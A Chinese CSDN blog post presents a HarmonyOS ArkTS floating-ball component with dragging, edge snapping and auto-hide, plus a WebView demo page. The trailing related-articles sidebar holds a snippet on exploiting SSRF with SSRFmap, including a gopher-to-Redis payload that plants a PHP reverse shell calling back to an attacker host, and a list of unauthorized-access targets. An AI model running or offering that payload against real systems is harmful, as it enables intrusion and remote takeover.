鸿蒙Next学习-悬浮窗口/拖动/吸边

已于 2024-12-03 09:19:38 修改
阅读量787 收藏 7
点赞数 5
文章标签: 学习 harmonyos
于 2024-12-03 09:13:34 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/Kimser/article/details/144203703
版权

实现了一个可以拖拽的悬浮球组件,支持自动贴边和隐藏等功能,适用于窗口场景。以下是对其功能的详细描述:

1. 组件介绍

该悬浮球(FloatBall)组件是一种浮动在窗口中的 UI 元素,用户可以通过拖动该元素,在屏幕上自由移动。同时,组件支持自动隐藏和自动贴边的功能,当用户不操作悬浮球时,它可以半透明隐藏或者贴靠屏幕的边缘。该组件设计为通用,可以在鸿蒙系统中应用于各种场景。

2. 状态变量

组件中使用了多个状态变量来控制悬浮球的显示、移动和透明度等功能:

  • statusHeight:状态栏的高度,用于计算窗口内有效区域。
  • bottomAvoidAreaHeight:底部规避区域的高度,防止悬浮球被遮挡。
  • curLeftcurTop:当前悬浮球的相对于窗口左上角的横纵坐标。
  • opacityN:悬浮球的透明度,通过该变量控制悬浮球在不同状态下的显示效果。

3. 移动与触摸控制

该组件实现了悬浮球的拖动功能,通过监听触摸事件(onTouch)来响应用户操作。代码中的逻辑包括:

  • 记录触摸按下时悬浮球的位置和触摸点的坐标。
  • 根据用户的拖动,实时更新悬浮球的位置,并限制其在屏幕边界范围内移动。
  • 松开手指后,根据设置,悬浮球会自动隐藏或者贴边。

4. 自动隐藏和贴边功能

该组件支持自动隐藏和自动贴边两种特性,分别在用户不操作时触发:

  • 自动隐藏:在一段时间后悬浮球会逐渐变为半透明并隐藏,隐藏的时间间隔可以通过 aotoHideTime 属性来配置。
  • 自动贴边:悬浮球松开后会自动靠近最近的屏幕边缘,通过动画完成平滑的贴边操作,贴边超时时间通过 aotoEdgingTime 配置。

5. 生命周期方法

aboutToAppear() 方法在组件初始化时调用,负责获取当前窗口的信息,例如状态栏高度、规避区域高度、窗口宽度等,并根据这些信息设置悬浮球的初始位置(默认为屏幕右下角)。

6. 透明度控制

组件支持透明度变化,当用户操作悬浮球时,透明度恢复为默认值 (opacityDefault);当悬浮球进入半隐藏状态时,透明度会降低 (opacityHide)。

7. 事件传递机制

组件可以通过回调函数的方式将点击、隐藏、贴边等事件传递给外部使用者:

  • onClickEvent:悬浮球点击事件。
  • onEdgingEvent:悬浮球贴边事件。
  • onHideEvent:悬浮球隐藏事件。
  • onShowEvent:悬浮球显示事件。

这些事件处理函数允许外部代码在触发相应事件时,执行自定义逻辑。

8. 动画处理

悬浮球的显示、隐藏、以及贴边操作,均通过动画实现,使交互过程更加流畅和友好。代码使用 animateTo 方法,指定动画持续时间,并在动画结束时调用相应的回调函数。

9. 扩展性与定制化

通过该代码,开发者可以方便地修改悬浮球的外观(如图片资源、半径大小),以及其行为(如自动隐藏时间、是否允许超过边界、是否启用拖动等),满足多种应用场景的需求。

悬浮球组件
import { window } from '@kit.ArkUI'

const TAG: string = '[FloatBall]';


/**
 * 悬浮球
 */
@Entry
@Component
export struct FloatBall {
  @State statusHeight: number = 0          // 状态栏高度
  @State bottomAvoidAreaHeight: number = 0 // 手机底部规避区域高度
  @State curLeft: number = 0               // 当前悬浮按钮距离窗口左边距离
  @State curTop: number = 0                // 当前悬浮按钮距离窗口顶部距离
  @State opacityN: number = 0              // 当前透明度
  private startLeft: number = 0            // 开始移动那一刻悬浮按钮距离窗口左边距离
  private startTop: number = 0             // 开始移动那一刻悬浮按钮距离窗口顶部距离
  private startX: number = 0               // 开始移动触摸点x坐标,相对窗口左上角
  private startY: number = 0               // 开始移动触摸点y坐标,相对窗口左上角
  private winWidth: number = 0             // 窗口宽度
  private winHeight: number = 0            // 窗口高度
  private isTouc = false                   // 是否触摸中
  private time = 0                         // 隐藏定时器
  private state = 0                        // 当前状态 0 未处理 1 显示 2 贴边 3 隐藏
  fixedLeft:boolean = false                // 固定左边
  fixedRight:boolean = false               // 固定右边
  image: Resource = null!                  // 图片资源
  radius: number = 25                      // 悬浮按钮半径
  opacityHide: number = 1.0                // 半隐藏后的透明度
  opacityDefault: number = 1.0             // 默认透明度
  marginSart = 25                          // 从隐藏恢复到显示状态的默认边距
  aotoHide = true                          // 开启自动隐藏
  aotoHideTime = 3000                      // 自动隐藏的超时时间
  aotoEdging = true                        // 自动贴边
  enableOutEdging = true                   // 拖拽时允许超过边界
  enableDragWhenHidden = true              // 允许隐藏时直接拖动,如果false,则需要先点击一下,从隐藏状态显示后,才能继续拖动
  aotoEdgingTime = 3000                    // 自动贴边的超时时间
  onClickEvent?: () => boolean;            // 点击事件传递, 如果返回false,则阻止后续事件
  onEdgingEvent?: () => boolean;           // 贴边事件传递, 如果返回false,则阻止后续事件
  onHideEvent?: () => boolean;             // 半隐藏事件传递, 如果返回false,则阻止后续事件
  onShowEvent?: () => boolean;             // 显示事件传递, 如果返回false,则阻止后续事件

  /**
   * 生命周期函数-初始化
   */
  aboutToAppear() {
    // 初始化透明度
    this.opacityN = this.opacityDefault
    // 初始化窗口信息
    this.getWindowInfo()
  }

  /**
   * 获取窗口尺寸信息
   */
  getWindowInfo() {
    window.getLastWindow(getContext(this), (err, windowClass) => {
      if (!err.code) { //状态栏高度
        this.statusHeight = px2vp(windowClass.getWindowAvoidArea(window.AvoidAreaType.TYPE_SYSTEM).topRect.height)
        //获取手机底部规避区域高度
        this.bottomAvoidAreaHeight =
          px2vp(windowClass.getWindowAvoidArea(window.AvoidAreaType.TYPE_NAVIGATION_INDICATOR)
            .bottomRect
            .height) //获取窗口宽高
        let windowProperties = windowClass.getWindowProperties()
        this.winWidth = px2vp(windowProperties.windowRect.width)
        this.winHeight = px2vp(windowProperties.windowRect.height)
        //设置初始位置位于屏幕右下角,演示设置可根据实际调整
        this.curLeft = 10
        if(this.fixedRight){
          this.curLeft = this.winWidth - this.radius * 2
        } else if(this.fixedLeft){
          this.curLeft = 0
        } else{
          this.curLeft = 10
        }
        this.curTop = this.winHeight * 0.75

        // 开启自动用隐藏
        if (this.aotoHide) {
          this.onHide()
        }
      }
    })
  }

  /**
   * UI 绘制
   */
  build() {
    //悬浮按钮
    Row() {
      Image(this.image).width(this.radius * 2)           // 图片
    }
    .width(this.radius * 2)
    .height(this.radius * 2)
    .justifyContent(FlexAlign.Center)
    .borderRadius(this.radius)
    // .backgroundColor('#E8E8E8')
    .opacity(this.opacityN)                             // 透明度
    .position({ x: this.curLeft, y: this.curTop })      // 位置绑定,注意@State关键词
    .onTouch((event: TouchEvent) => {                   // 手指按下记录初始触摸点坐标、悬浮按钮位置
      if (event.type === TouchType.Down) {
        this.isTouc = true
        console.log('TouchEvent: 按下');
        // 恢复透明度
        this.restoreOpacity()
        this.startX = event.touches[0].windowX
        this.startY = event.touches[0].windowY
        this.startLeft = this.curLeft
        this.startTop = this.curTop
      }                                                 // 按下
      else if (event.type === TouchType.Up) {
        this.isTouc = false
        console.log('TouchEvent: 松开');
        if (this.aotoHide) {                            // 松开后隐藏
          this.onHide()
        } else if (this.aotoEdging) {                   // 松开后贴边
          this.onEdging()
        }
      }
      else if (event.type === TouchType.Move) {         // 拖动
        if(this.state == 3 && !this.enableDragWhenHidden){
          return
        }
        this.isTouc = true
        let touch = event.touches[0]                                        // 获取手指触摸位置
        let curLeft = this.startLeft + (touch.windowX - this.startX)        // 计算悬浮球位置
        // 只有在没固定情况下才能移动
        if(!this.fixedLeft && !this.fixedRight) {
          // 是否允许超过边界
          if(!this.enableOutEdging){
            curLeft = Math.max(0, curLeft)                                    // 限制悬浮球不能移除屏幕右边
            this.curLeft = Math.min(this.winWidth - 2 * this.radius,curLeft)  // 限制悬浮球不能移除屏幕左边
          } else{
            this.curLeft = curLeft
          }
        }
        let curTop = this.startTop + (touch.windowY - this.startY)          // 限制悬浮球不能移除屏幕上边
        curTop = Math.max(0, curTop)                                        // 限制悬浮球不能移除屏幕下边
        this.curTop =
          Math.min(this.winHeight - 2 * this.radius - this.bottomAvoidAreaHeight - this.statusHeight, curTop)
        console.log('TouchEvent: 移动');
      }
    })
    .onClick(() => {
      if (!this.isShow() || this.state == 3) {
        this.onMyShow()
        return
      }
      let fal = false
      if (this.onClickEvent !== undefined) {
        fal = this.onClickEvent();
      }
      if (fal && this.aotoHide) {
        this.onHide();                                                     // 点击完,就继续去隐藏
      }
    })

  }

  public onMyClick2(onClickEvent: () => boolean) {
    this.onClickEvent = onClickEvent
  }

  /**
   * 隐藏
   */
  onHide() {
    // 如果已经是隐藏,就退出
    if (!this.isShow()) {
      return
    }
    // 如果开启了自动贴边,就先判断是否贴边
    if (this.aotoEdging && !this.ifEdging()) {
      // 先执行贴边
      console.log(TAG, "开启了自动贴边, 当前未贴边")
      this.onEdging()
      return
    }
    // 先取消上一个定时器,在搞新的
    if (this.time != 0) {
      console.log(TAG, "清除上次未执行的目标")
      clearTimeout(this.time);
    }
    console.log(TAG, "创建目标: 隐藏")
    this.time = setTimeout(() => {
      console.log(TAG, "进入执行目标: 隐藏")
      this.onMyHideDo()
    }, this.aotoHideTime)
  }

  /**
   * 贴边
   */
  onEdging() {
    // if (this.time != 0) {
    //   console.log(TAG, "清除上次未执行的目标")
      // clearTimeout(this.time)
    // }
    console.log(TAG, "创建目标: 贴边")
    // this.time = setTimeout(() => {
      console.log(TAG, "进入执行目标: 贴边")
      this.onEdgingDo()
    // }, this.aotoEdgingTime)
  }

  /**
   * 执行贴边
   */
  onEdgingDo() {
    if (this.isTouc) {
      // 如果还在触摸中,就往后延时执行
      console.log(TAG, "推后执行目标:在触摸中 贴边")
      this.onEdging()
    } else {
      this.state = 2
      // 隐藏动画
      console.log(TAG, "执行目标:贴边")
      animateTo({
        duration: 1000,
        onFinish: (() => {
          console.log(TAG, "贴边动画结束")
          let fal = true
          // 记得清除定时器资源
          clearTimeout(this.time)
          this.time = 0
          // 传递贴边事件
          if(this.onEdgingEvent !== undefined){
            fal = this.onEdgingEvent()
          }
          // 贴边动画结束 开始准备隐藏
          if (fal && this.aotoHide) {
            this.onHide()
          }
        })
      }, () => {
        // 修改位置
        if (this.curLeft > this.winWidth / 2) {
          this.curLeft = this.winWidth - this.radius * 2
        } else {
          this.curLeft = 0
        }
      })
      // 取消定时器
      if (this.time != 0) {
        clearTimeout(this.time);
        this.time = 0
      }
    }
  }

  /**
   * 执行隐藏动作
   */
  onMyHideDo() {
    if (this.isTouc) {
      // 如果还在触摸中,就往后延时执行
      console.log(TAG, "推后执行目标:在触摸中 隐藏")
      this.onHide()
    } else {
      this.state = 3
      // 隐藏动画
      console.log(TAG, "执行目标:隐藏")
      animateTo({
        duration: 1000,
        onFinish: (() => {
          console.log(TAG, "隐藏动画结束")
          // 记得清除定时器资源
          clearTimeout(this.time)
          this.time = 0
          // 传递隐藏事件
          if(this.onHideEvent !== undefined){
            this.onHideEvent()
          }
        })
      }, () => {
        // 修改透明度
        this.onOpacity()
        // 修改坐标
        if (this.curLeft > this.winWidth / 2) {
          this.curLeft = this.winWidth - this.radius
        } else {
          this.curLeft = 0 - this.radius
        }
      })
      // 取消定时器
      if (this.time != 0) {
        clearTimeout(this.time);
        this.time = 0
      }
    }
  }

  /**
   * 显示
   */
  onMyShow() {
    // 显示动画
    console.log(TAG, "执行目标:显示")
    this.state = 1
    animateTo({
      duration: 500, onFinish: (() => {
        console.log(TAG, "显示动画结束")
        let fal = true
        // 记得清除定时器资源
        clearTimeout(this.time)
        this.time = 0
        if(this.onShowEvent !== undefined){
          fal = this.onShowEvent()
        }
        if(fal){
          // 重新加载隐藏
          this.onHide()
        }
      })
    }, () => {
      // 修改坐标
      if (this.curLeft > this.winWidth / 2) {
        this.curLeft = this.winWidth - this.radius * 2 - this.marginSart
      } else {
        this.curLeft = this.marginSart
      }
    })
    // 显示后,就取消定时器
    if (this.time != 0) {
      clearTimeout(this.time);
      this.time = 0
    }
  }

  /**
   * 启用半透明
   */
  onOpacity(){
    this.opacityN = this.opacityHide
  }

  /**
   * 恢复默认透明度
   */
  restoreOpacity(){
    this.opacityN = this.opacityDefault
  }

  /**
   * 判断是否是隐藏状态
   * @returns
   */
  isShow() {
    if (this.curLeft < 0) {
      return false
    } else if (this.curLeft >= this.winWidth - this.radius) {
      return false
    }
    return true
  }

  /**
   * 判断是否贴边
   * @returns
   */
  ifEdging() {
    if (this.curLeft == 0) {
      return true
    } else if (this.curLeft == this.winWidth - this.radius * 2) {
      return true
    }
    return false
  }
}
父页面 
import { FloatBall } from 'lib_base/src/main/ets/common/view/FloatBall';
import { promptAction } from '@kit.ArkUI';
import { webview } from '@kit.ArkWeb';

@Entry
@Component
struct Index {
  controller: WebviewController = new webview.WebviewController();

  build() {
    Stack() {
      // 一个webview,充当用户业务视图
      Web({ src: "https://www.baidu.com", controller: this.controller })
        .domStorageAccess(true)
        .onlineImageAccess(true)
        .imageAccess(true)
        .zoomAccess(false)                             // 禁止缩放
        .javaScriptAccess(true)                        // 启用js交互
        .backgroundColor(Color.White)                  // 背景
        .width('100%')

      // 悬浮按钮
      FloatBall({
        image: $r('app.media.loading'),             // 图片资源
        radius: 25,                                   // 悬浮按钮半径
        marginSart: 25,                               // 从隐藏恢复到显示状态的默认边距
        aotoEdging: true,                             // 开启自动贴边
        aotoHideTime: 10,
        aotoEdgingTime: 300,
        enableOutEdging: false,
        aotoHide: false,                               // 开启自动隐藏
        opacityHide: 0.5,                             // 半隐藏后的透明度
        onClickEvent: (): boolean => {                // 点击事件
          promptAction.showToast({ message: '点击了悬浮球' });
          if(this.controller.accessStep(-1)){
            this.controller.backward(); // 返回上一个web页
          }
          return true
        },
        onEdgingEvent: (): boolean => {
          promptAction.showToast({ message: '我贴边了' });
          return true
        },
        onHideEvent: (): boolean => {
          promptAction.showToast({ message: '我隐藏了' });
          return true
        },
        onShowEvent: (): boolean => {
          promptAction.showToast({ message: '我显示了' });
          return true
        }
      })
        // .touchable(false)                         // 这个过期了,.hitTestBehavior(HitTestMode.None)代替
        .hitTestBehavior(HitTestMode.None)           // 重要用于点击事件穿透,不然无法点击Web内容
        .width("100%")
        .height("100%")
    }
    .height('100%')
    .width('100%')
  }
}

Kimser
关注
渗透测试突破口——未授权访问
m0_61506558的博客
10-19 1036
本地监听端口 >> 创建Application >> 调用Submit Application API提交。0x04 Elasticsearch未授权访问。默认端口27017直接连接进行增删改查。0x05 Memcache未授权访问0x08 ActiveMQ未授权访问0x02 Jenkins未授权访问0x03 MongoDB未授权访问0x06 Hadoop未授权访问0x07 Docker未授权访问0x09 JBOSS未授权访问。也可以反向shell。
Elasticsearch外网无法通过ip访问
赵广陆
02-09 5963
目录1 遇到的问题2 解决方法 1 遇到的问题 外网服务器安装 elasticsearch,解压elasticsearch之后,启动,通过 http://localhost:9200 可以访问的到,但是 http://ip:9200 访问不到,怎么办呢?解决如下 首先,需要明确自己的Elasticsearch版本信息 1. 问题:为什么使用外网 ip:9200 访问不了? 2 解决方法 Elasticsearch 默认只能通过 localhost/127.0.0.1本机环回地址访问 。如需要设置支持其
Centos7+Elasticsearch7.4.2+Kibana+IK分词+ElasticHD 安装配置以及集群搭建
Nica9799的博客
12-11 1274
Centos7+Elasticsearch7.4.2+Kibana 安装配置以及集群搭建elasticSearch 7.4.2 安装关于jdk安装ES集群的搭建配置文件合理的创建标题,有助于目录的生成如何改变文本的样式如何插入一段漂亮的代码片生成一个适合你的列表创建一个表格设定内容居中、居左、居右SmartyPants创建一个自定义列表如何创建一个注脚注释也是必不可少的KaTeX数学公式新的甘特图...
Elasticsearch】网络配置
最新发布
risc123456的博客
03-02 599
Elasticsearch 支持使用特殊值(如`_local_`、`_site_`、`_global_`、`_[networkInterface]_`和`0.0.0.0`)自动解析网络地址。• `network.tcp.send_buffer_size`和`network.tcp.receive_buffer_size`:调整 TCP 发送和接收缓冲区大小,以优化性能。• `http.max_content_length`:限制 HTTP 请求正文的最大大小(默认为`100mb`)。
SpringBoot 入坑(五)Elasticsearch端口访问被拒绝 问题解决
FATCATS博客
05-25 3240
起初:docker安装好elasticsearch,正常启动之后,发现通过端口访问被拒绝,但是小编也查看了docker正在运行的容器,发现elasticsearch镜像确实是在运行的 配置+解决1.配置工作2.解决方案 1.配置工作 小编在这里补充一下,下载Elasticsearch镜像的时候不指定版本会超时,所以下载的时候建议指定版本 docker run -e ES_JAVA_OPTS="-Xms256m -Xmx256m" -d -p 9200:9200 -p 9300:9300 --name 自定义
elasticsearch外网IP无法访问
z785495295的博客
01-03 1667
curl "http://127.0.0.1:9200" 能够正常访问,可是使用外网ip就提示拒绝链接 解决办法:vim config/elasticsearch.yml 增加:network.host: 0.0.0.0 重启问题解决,外网内网都可以访问了 如图: 另外,个别虚拟机无法启动ES,查看日志如果有: [2017-03-28T15:35:19,948][ERROR][...
Elasticsearch访问 IP:9200 问题
热门推荐
菜鸟题巢
07-28 5万+
Elasticsearch 访问 链接:9200问题 在Centos6.5虚拟机上安装了ES,只能在虚拟机上通过127.0.0.1:9200访问,代表安装成功 当在本地通过虚拟机ip+9200访问时出现错误。 解决方案: 在安装路径下的config/elasticsearch.yml文件中, 添加 network.host: 0.0.0.0 表示所有用户可访问 按理...
外网访问内网Resin
weixin_33806300的博客
11-09 361
为什么80%的码农都做不了架构师?>>> ...
elasticsearch访问9200端口拒绝连接
m0_50967546的博客
12-07 6115
对于我这边来说是出于安全性的考虑,服务器的弹性公网IP有限制,所以拒绝连接。 但是由于elasticsearch是安装在虚拟机本机上的,所以可以通过Linux命令curl查看9200端口返回的内容 curl http://127.0.0.1:9200 ...
ElasticSearch未授权访问
打代码的小女孩
11-17 7574
0x00 漏洞描述: Elasticsearch是一款java编写的企业级搜索服务。越来越多的公司使用ELK作为日志分析,启动此服务默认会开放9200端口,可被非法操作数据 0x01 一些利用的URL http://101.198.161.130:9200/_cat/indices/ http://101.198.161.130:9200/_plugin/head/ http://101.198....
Xshell 隧道配置 :进行内网服务访问
weixin_42067311的博客
09-04 6617
Xshell 隧道配置 :进行内网服务访问 **此文档应用于使用跳板机访问内网地址服务,再外网访问不到内网服务后请进行参考 本文档转载请声明出处》》》》》 {:伊丽莎白粥} Xshell版本 Xshell 6 申请内网跳板机,能用Xshell连接并使用 下面开始配置隧道进行访问内网服务 下载地址 :https://www.netsarang.com/products/xsh_ove...
elasticsearch本地集群搭建及远程服务器搭建注意事项及kibana配置
wkNote
08-15 3737
首先下载解压elasticsearch压缩包,我使用的版本为elasticsearch-6.3.2-2,解压后的路径为E:\elasticsearch-6.3.2-2。 在解压目录下有config文件夹,里面有elasticsearch.yml文件,这个即为我们需要修改的配置文件。 修改以下配置 # 这个参数必须设置 此参数是用来允许单机允许多个实例,默认不允许 node.max_lo...
修改elasticsearch监听端口 从0.0.0.0127.0.0.1
11-23
elasticsearch 在Centos上,修改elasticsearch监听端口 从0.0.0.0127.0.0.1,提供文档说明
外网/虚拟机中Elasticsearch无法访问的问题
刘伟佳的博客
11-17 1207
完美解决,何止在电脑上能访问虚拟机里面的,只要在一个网络里面,连手机上都能访问!我的版本:7.10.0
【配置】elasticsearch 服务器运行后局域网访问不了
Mr_Wanter
03-05 6358
在安装路径下的config/elasticsearch.yml文件中, 添加network.host: 0.0.0.0表示所有用户可访问远程访问 network.bind_host: 192.168.0.1 设置绑定的ip地址,可以是ipv4或ipv6的,默认为0.0.0.0,绑定这台机器的任何一个ip。 network.publish_host: 192.168.0.1 设置其...
elasticsearch 无法使用IP访问解决办法
12-22 4400
本地测试完成后,打算上线试用,可是发现elasticsearch服务器无法在另一台电脑上连接,网上大部分说的是在elasticsearch.yml中增加如下配置 network.host:0.0.0.0 可是这么做了以后,无法启动es服务器,后来在博客中看到 解决elasticsearch7.x配置远程0.0.0.0无法开启服务问题终极版!,原文链接:https://blog.csdn.net/adminstor/article/details/103855476 根据文章设置,如下 在ela.
怎么修改Elasticsearch的对外ip 默认是本地IP 127.0.0.1
weixin_33981932的博客
03-11 2814
//修改C:\Program Files\elasticsearch-2.1.1\config\elasticsearch.yml: network.bind_host: 172.16.1.86 path.data: E:\ElasticsearchData\Data path.logs: E:\ElasticsearchData\Logs  
Springboot整合BBoss-Elasticsearch启动一直连127.0.0.1(解决方法)
qq_18453581的博客
06-02 1004
官方解决方法 点我跳转 可用
SSRFmap如何反弹shell
01-06
### 使用SSRFmap实现反弹Shell的方法 #### 工具准备 为了成功实施基于SSRF的攻击并最终获得目标系统的控制权,需要准备好必要的工具和环境配置。SSRFmap是一个专门用于探索和利用服务器端请求伪造(SSRF)漏洞的强大工具[^2]。 #### 利用流程 当确认目标存在可被利用的SSRF漏洞时,可以通过以下方式尝试获取更高权限: - **探测内部服务**:使用`ssrfprobe`模块来扫描内部网络的服务开放情况,这有助于发现潜在的目标如Redis、ElasticSearch等可能存在未授权访问风险的服务。 ```bash python ssrfmap.py -u "http://target.com/vuln?param=http://" --proxy http://127.0.0.1:8080 -m ssrfprobe ``` - **针对特定应用层协议的攻击向量构建** 对于已知易受攻击的应用程序接口(API),可以根据其特性定制相应的载荷(payloads)。例如,在处理HTTP响应重定向或解析URL的过程中可能出现的安全隐患。 - **绕过WAF/IDS检测机制** SSRFmap内置了一些技巧可以帮助避开常见的Web应用程序防火墙(WAF)以及入侵检测系统(IDS)规则集。这些技术包括但不限于修改User-Agent字符串、添加额外参数混淆实际意图等。 - **执行命令注入** 如果能够影响到某些支持外部资源加载的功能点,则有机会构造恶意输入触发远程代码执行(RCE)[^4]。特别是对于那些允许指定任意URI作为数据源的情况更为危险。 - **建立持久化连接** 成功渗透进入受害主机之后,下一步就是维持对该机器的长期掌控。此时可以考虑设置计划任务(cron job)或者其他形式的任务调度器定期回连至攻击者控制下的C&C服务器。 具体到通过Gopher协议配合Redis实现反弹shell的操作如下所示: 假设已经找到一个带有SSRF缺陷并且能与之交互的web页面参数,同时得知内网中有台Redis实例正处于无认证状态运行着,并且是以超级管理员(root)身份启动的话——那么就可以精心设计一条特殊的payload让该网站发起指向特殊格式url(`gopher://`)的GET请求,进而间接操控远端数据库完成一系列指令下达直至植入后门脚本为止。 ```python import requests # 构造Payload payload = 'gopher://localhost:6379/_SET%20cron.php%20"<?php%20exec(''bash%20-i%20>%26%20/dev/tcp/your_ip/your_port%200>%261'');?>"' # 发送含有恶意链接的数据包给有漏洞的地方 requests.get(f'http://example.com/ssrf_endpoint?url={payload}') ``` 上述Python代码片段展示了如何发送包含恶意负载的HTTP GET请求以利用SSRF漏洞并通过Gopher协议操纵Redis创建一个新的PHP文件[cron.php],其中嵌入了一条Linux Shell命令用来打开反向外壳连接回到攻击者的监听地址上。 请注意以上内容仅限安全研究学习目的,请勿非法使用!
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值